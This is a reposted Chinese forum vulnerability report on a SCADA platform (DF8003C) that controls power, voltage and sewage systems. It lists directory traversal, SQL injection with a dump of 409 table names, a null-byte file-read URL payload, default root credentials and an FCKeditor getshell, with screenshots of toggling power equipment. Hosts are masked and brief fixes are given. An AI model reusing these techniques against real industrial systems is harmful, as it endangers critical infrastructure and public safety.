HanDs
NO.2

[7月漏洞公开] 某大型SCADA通用系统多处漏洞可控制/电压系统/污水处理系统/供电设备系统(无需登录getshell) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

最后才发现这是跟我开的一个玩笑!

狗哥:这次硬不硬

详细说明:



#1 前言



系统采用的是一款东方DF8003C型号的控制系统,这里有个简单介绍

code 区域
http://**.**.**.**/link?url=voTDWhx82NQaCYRe9JGAbzuPxDjetIru7aYlyyl7EFpVEOofDyRykcDYdPQNGmitPvCrco9_mcFQhheNDu4YYsKP7e01YDsCx4MBLzPX6CK



系统能进行操作的功能如简介里面一样

1.png





#2 漏洞



这套系统问题多,我前期排查一共发现三处高危漏洞,其中两处可直接利用



第一处:目录遍历



code 区域
**.**.**.**:5000





code 区域
help/php

目录下直接遍历很多关键文件



1.png





第二处:

大家应该也已经看到fck编辑器了吧,这里就不说这个编辑器了



第三处:

这套系统存在一个通用SQL注入漏洞



#3 测试中...



找到SQL注入漏洞,那问题也很简单,只需要找到管理员的表即可

code 区域
| C2000_动作信息          |
| C2000_定值信息 |
| C2000_测量类型 |
| C2000_自检信息 |
| CAS2000_动作信息 |
| CAS2000_故障信息 |
| CAS2000_测量信息 |
| CAS2000_自诊断信息 |
| CDT扩展五防规约配置表 |
| CDT规约配置表 |
| CSC2000_动作信息 |
| CSC2000_定值信息 |
| CSC2000_故障信息 |
| CSC2000_自诊断信息 |
| CSC2000_量测信息 |
| DA出口开关参数表 |
| DA区域参数表 |
| DA开关拓扑表 |
| DA故障事项表 |
| DA故障定位信息表 |
| DA故障待恢复区域信息表 |
| DA故障待恢复系统信息表 |
| DA故障恢复开关信息表 |
| DA故障恢复方案ߣ |
| DA故障扩大隔离开关信息表 |
| DA故障索引表 |
| DA故障隔离开关信息表 |
| DA环网柜开关表 |
| DA线路拓扑表 |
| DA运行参数设置表 |
| DF3000NEW_动作信息 |
| DF3000NEW_定值信息 |
| DF3000NEW_辅助定值信息 |
| DF3000NEW_量测信息 |
| DF3003_动作自检 |
| DF3003_定值信息 |
| DF3003_量测信息 |
| DF3600_动作信息 |
| DF3600_定值信息 |
| DF3600_故障信息 |
| DF3600_测量值信息 |
| DF3600_量测信息 |
| DFP500_定值信息 |
| DFP500_开关量 |
| DFP500_故障信息 |
| DFP500_测量值 |
| DFP500_自诊断信息 |
| DFP_动作信息 |
| DFP_定值量值 |
| DFP_定值量值类型 |
| DFP_自检信息 |
| DM配置类型索引表 |
| DM配置表 |
| DSA_301动作信息 |
| DSA_301定值信息 |
| DSA_301故障信息 |
| DSA_301测量值信息 |
| DSA_301自诊断信息 |
| DWK_动作信息 |
| DWK_故障信息 |
| EMS线路段参数表 |
| EPRISVC_事件信息 |
| EPRISVC_定值信息 |
| EPRISVC_开出信息 |
| EPRISVC帧类别 |
| EPRISVC模块类型 |
| FBZ_动作信息 |
| FBZ_定值信息 |
| FBZ_故障信息 |
| FBZ_自诊断信息 |
| FBZ_量测信息 |
| FDK高速采样模块参数表 |
| FWB_动作信息 |
| FWB_定值信息 |
| FWB_测量信息 |
| FWB_诊断信息 |
| FWB_配置信息 |
| GPRS参数表 |
| HUANENG_定值信息 |
| HUANENG_量测信息 |
| IEC101zf规约配置表 |
| IEC101规约配置表 |
| IEC103_ASDU1 |
| IEC103_ASDU10 |
| IEC103_ASDU2 |
| IEC103_故障信息 |
| IEC103信息对照表 |
| IEC103装置类型表 |
| IEC104zf规约配置表 |
| IEC104规约配置表 |
| ISA300_动作信息 |
| ISA300_定值信息 |
| ISA300_故障信息 |
| ISA300_自诊断信息 |
| ISA300_量测信息 |
| ISA_动作信息 |
| ISA_定值信息 |
| ISA_小电流接地表 |
| ISA_故障信息 |
| ISA_测量值信息 |
| ISA_自诊断信息 |
| JINNENG_定值信息 |
| LFP_事件信息 |
| LFP_定值信息 |
| LFP_开关量信息 |
| LFP_模块信息 |
| LFP_模拟量信息 |
| LFP_自检信息 |
| LSA_P_动作信息 |
| LSA_P_定值信息 |
| LSA_P_故障信息 |
| LSA_P_测量值信息 |
| LSA_P_自诊断信息 |
| MLN98_小电流接地表 |
| N4F配置表 |
| NEWISA_动作信息 |
| NEWISA_定值信息 |
| NEWISA_小电流接地表 |
| NEWISA_故障信息 |
| NEWISA_测量值信息 |
| NEWISA_自诊断信息 |
| NZC_事件信息 |
| RCS9000_动作信息 |
| RCS9000_开关量状态 |
| RDCU_动作信息 |
| RDCU_定值信息 |
| RTU值表 |
| RTU参数表 |
| RTU路径参数表 |
| RTU路径状态值表 |
| SAC94_事件信息 |
| SBC_动作信息 |
| SCADA_MIS设备对照表 |
| SCADA应用对象类型表 |
| SCIZF配置表 |
| SCI配置表 |
| SEL_动作信息 |
| TIGER_定值信息 |
| TOPO开关刀闸参数表 |
| TOPO母线参数表 |
| TOPO线路参数表 |
| TOPO连接节点表 |
| UT99_定值信息 |
| VW_EVT_TYPE |
| WBX_事件信息 |
| WBX_定值信息 |
| WBX_测量信息 |
| WEB_AOPINFO |
| WEB_MACHINE |
| WEB_ONLINE |
| WEB_USERS |
| XAKY_定值信息 |
| XJS99_定值信息 |
| XJS99模块类型 |
| ZH_定值信息 |
| ZH_测量值信息 |
|  |
| ! |
| ! |
| 保护DF3003装置类型 |
| 刀闸表 |
| 报警图索引表 |
| 状态信息表 |
| 规约配置表 |
| 追忆参数表\x03 |
| 追忆组信息表\x05 |
| dnp规约配置表 |
| dtproperties |
| histable |
| histableother |
| newid |
| reltable |
| sysconstraints |
| syssegments |
| testtb |
| tmp_code |
| tmp_codeone |
| tmp_compare |
| tmp_count |
| tmp_data |
| tmp_maxtime |
| tmp_mintime |
| tmp_mondata |
| tmp_mondate |
| tmp_over |
| tmp_overone |
| tmp_overvoltage |
| tmp_total |
| tmp_voltage |
| tmp_yccode |
| tmp_yeardata |
| tmp_yeardate |
| tp_max |
| tp_min |
| trashid |
| viewtable |
| 主机状态表 |
| 事项句表 |
| 事项处理方式表I |
| 事项模式表 |
| 事项状态描述表 |
| 事项类型信息表 |
| 事项类型表 |
| 事项级别表 |
| 五防控制对象表 |
| 五防控制条件表 |
| 五防控制组表 |
| 五防操作序列表 |
| 五防操作组表 |
| 五防设备许可表 |
| 保护DF3000NEW装置类型 |
| 保护DF3003功能类型 |
| 保护DF3600装置类型 |
| 保护FWB模块类型 |
| 保护HUANENG模块类型 |
| 保护JINNENG模块类型 |
| 保护LFP模块类型 |
| 保护NEWISA装置类型 |
| 保护RCS9000模块类型 |
| 保护RDCU_模块类型 |
| 保护SAC94事件类型 |
| 保护SEL动作类型 |
| 保护SEL模块类型 |
| 保护UT99模块类型 |
| 保护WBX保护类型 |
| 保护WBX功能类型 |
| 保护XJ事件类型 |
| 保护信号值表 |
| 保护信号表 |
| 保护类型1表 |
| 保护类型2表 |
| 保护类型表 |
| 保护装置表 |
| 保护规约类型表 |
| 公司参数表 |
| 其他转发视图 |
| 刀闸值表 |
| 刀闸参数表 |
| 分接头类型表 |
| 列查询配置表 |
| 前置事故总配置表 |
| 前置终端服务器表 |
| 前置计算配置表 |
| 前置配置表 |
| 区域参数表 |
| 升降参数表 |
| 厂站参数表 |
| 厂站表 |
| 厂站遥控闭锁对应表 |
| 厂站遥控闭锁表 |
| 历史数据期限表 |
| 历史服务器容量参数表 |
| 参数域属性表 |
| 参数表中间索引关系 |
| 参数表属性表 |
| 双遥控号对照表 |
| 发电机参数表 |
| 变压器参数表 |
| 变压器接线类型表 |
| 同期参数表 |
| 图形文件共享表 |
| 图形装饰域参数表 |
| 图形设备分类表 |
| 地标参数表 |
| 域修改配置表 |
| 域显示属性表 |
| 多态值表 |
| 多态参数表 |
| 定时打印信息表 |
| 实时库列模式 |
| 实时库域名表 |
| 实时库表名表 |
| 实时库表模式 |
| 实时库装载关系表 |
| 实时数据服务器名表 |
| 容器分量表 |
| 容器表 |
| 常用参数表 |
| 序列控制参数表 |
| 序列控制对象表 |
| 开关保护关系表 |
| 开关保护模块关系表 |
| 开关值表 |
| 开关刀闸参数表 |
| 开关参数表 |
| 开关替代关系表 |
| 开关表 |
| 开关连接刀闸表 |
| 开关连接设备表 |
| 微机保护参数表 |
| 微机保护权限表 |
| 报表 |
| 报表打印信息表 |
| 报表用户权限表 |
| 故障检测状态表 |
| 数据库应用分类索引表 |
| 数据库状态表 |
| 日时段参数表 |
| 日时段组名表 |
| 时段区域名表 |
| 时段参数表 |
| 服务器状态表 |
| 权限功能定义表 |
| 标志牌功能信息表 |
| 标志牌操作菜单配置表 |
| 标志牌记录表 |
| 档位信息表 |
| 档位遥调参数表 |
| 模拟量值表 |
| 次遥信号排序表 |
| 母线参数表 |
| 母线拓扑表 |
| 母线表 |
| 消弧线圈 |
| 消弧线圈档位表 |
| 状态值表 |
| 状态控制条件表 |
| 状态表 |
| 用户口令表 |
| 用户定义表 |
| 用户组表 |
| 用户角色表 |
| 用户责任区表 |
| 用户过程表 |
| 电压互感器表 |
| 电压名表 |
| 电压等级颜色对照表 |
| 电压等级颜色表 |
| 电压限值表 |
| 电子值班事项表 |
| 电子值班接收遥测用户表 |
| 电子值班用户表 |
| 电子值班短信遥测发送表 |
| 电子值班遥信点事项表 |
| 电子值班遥测点事项表 |
| 电容器参数表 |
| 电度值表 |
| 电度参数表 |
| 电度多源信息表 |
| 电度多源索引表 |
| 电度转发视图 |
| 电抗器参数表 |
| 电流互感器表 |
| 界面显示参数表 |
| 秒级曲线参数表 |
| 程序注册表 |
| 端子表 |
| 线路参数表 |
| 线路型号表 |
| 自定义潮流表 |
| 节点事项表 |
| 节点事项过滤表 |
| 节点厂站过滤表 |
| 节点对象过滤表 |
| 节点权限表 |
| 节点责任区表 |
| 节点镜像类型表 |
| 菜单属性表 |
| 表对象类型关系表 |
| 规约类型表 |
| 规约配置类型表 |
| 角色定义表 |
| 计算变量值表 |
| 计算变量表 |
| 设备对象类型关系表 |
| 设备状态表 |
| 设备类型表 |
| 负荷参数表 |
| 责任区定义表 |
| 转发遥控对照表 |
| 转发遥调对照表 |
| 远动规约类型视图 |
| 连接节点表 |
| 追态值表 |
| 通讯参数表 |
| 通讯组表 |
| 通讯组表前置视图 |
| 通道值表 |
| 通道参数表 |
| 通道报文日志表 |
| 通道曲线偏移表 |
| 通道状态值表 |
| 通道透明转发表 |
| 通道附属属性表 |
| 遥信参数表 |
| 遥信号排序表 |
| 遥信多源信息表 |
| 遥信多源索引表 |
| 遥信转发视图 |
| 遥控参数表 |
| 遥控提示表 |
| 遥测参数表 |
| 遥测多源信息表 |
| 遥测多源索引表 |
| 遥测报警限值表 |
| 遥测转发视图 |
| 遥测限值时段参数表 |
| 遥测限值时段类型表 |
| 遥调参数表 |
| 避雷器表 |
| 配调控制对象表 |
| 量测映射表 |
| 量测量参数表 |
| 镜像表模式 |
| 间隔值表 |
| 间隔参数表 |
| 零支路表 |
| dboutpara |
+-----------------+





一共409张表,后面找到管理员登录密码及账号



1.png





戏剧性的一幕来了,测试了半天,拿着注入出来的账号密码,满心欢喜的想登录,却发现怎么都是提示登录失败,无论在后台还是在前台都是如此



这突然心情....



这个时候我记得我之前突然找的到一张表,表名是用户口令表,但里面只出现了一个root



但是这个root却是关键了



进行登录账号密码的尝试



1.png





这样就进去了,切换到前台进行登录



1.png





这里可以直接进行电压和电力设备的开启及关闭

1.png







这套系统有人挖过,不再阐述太多。





第二台SCADA控制系统



这套问题相对来说 还要多一些,同时存在SQL注入及任意文件读取漏洞,需要%00截断



1.png





有了前一次的教训,既然系统界面大致一样,我在进行目录探测时,发现结构大概差不多,

会不会也是同样存在user表?又或者账号和密码都是默认生成的?



结果发现证明了我的观点



任意文件读取漏洞

code 区域
**.**.**.**:8181/modules/tmr/server/switchcontrolpanel.php?func=../../../../../../../../../../windows/win.ini%00.jpg

漏洞证明:

利用前一次的账号密码,直接进行了登录



1.png





系统界面大致一样,但功能还要强大一些,能操作配电系统、污水处理系统、热力站、深井检测系统



1.png





能开关多个区域供电设备

1.png



2.png





实时监控数据

1.png



1.png





利用fck编辑器



可以getshell

1.png





1.png





1.png



2.png







还有一个系统我就不测试了,到此结束



code 区域
声明:未进行任何相关危险操作







修复方案:

1.参数过滤

2.对访问目录的限制

3.编辑器修复或升级编辑器版本


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
大型 S CA DA
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组